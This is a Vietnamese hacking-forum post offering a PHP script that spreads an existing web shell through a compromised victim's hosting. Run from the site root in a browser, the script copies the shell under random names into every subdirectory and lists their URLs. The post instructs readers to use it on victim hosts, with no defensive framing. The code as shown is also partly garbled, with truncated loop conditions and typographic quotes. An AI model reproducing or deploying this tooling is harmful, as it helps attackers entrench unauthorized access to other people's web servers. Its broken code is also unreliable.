• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

Code phát tán shell trong Host victim

Admin

Well-Known Member
Staff member
Administrator
Đặt con này cùng thư mục với con shell.
Thay dòng dưới cho phù hợp:
Code:
[FONT=monospace]$shell = "ten_con_shell.php";[/FONT]
Sau đó gõ địa chỉ lên trình duyệt, nó sẽ copy vào tất cả thư mục con.
Tốt nhất nên để ở thư mục gốc của site để phát tán nhiều hơn.
Code:
[COLOR=#999999][FONT=monospace]$shell = “ten_con_shell.php”;[/FONT][/COLOR]
$host = $_SERVER['HTTP_HOST'];$root_dir = dirname(__FILE__);echo $root_dir.”“;lk(realpath(“./”));function lk($d){global $host;global $root_dir;global $shell;//echo “=====$d======“;if ($handle = opendir($d)){$dir_array = array();while ($file = readdir($handle)) {if($file!=”.”&&$file!=”..”){$realpath = $d.”/”.$file;if(is_dir($realpath))$dir_array[]=$realpath;}}}for($i=0;$i {$new_name = rand(0, 1000).”.php”;$tmp = $dir_array[$i];echo “http://”.str_replace($root_dir,$host,$tmp).”/”.$new_name.”“;copy($shell,$dir_array[$i].”\\”.$new_name);//echo $dir_array[$i].”“;}for($i=0;$i lk($dir_array[$i]);closedir($handle);} [COLOR=#999999][FONT=monospace]?>[/FONT][/COLOR]
 

Facebook Comments

New posts New threads New resources

Back
Top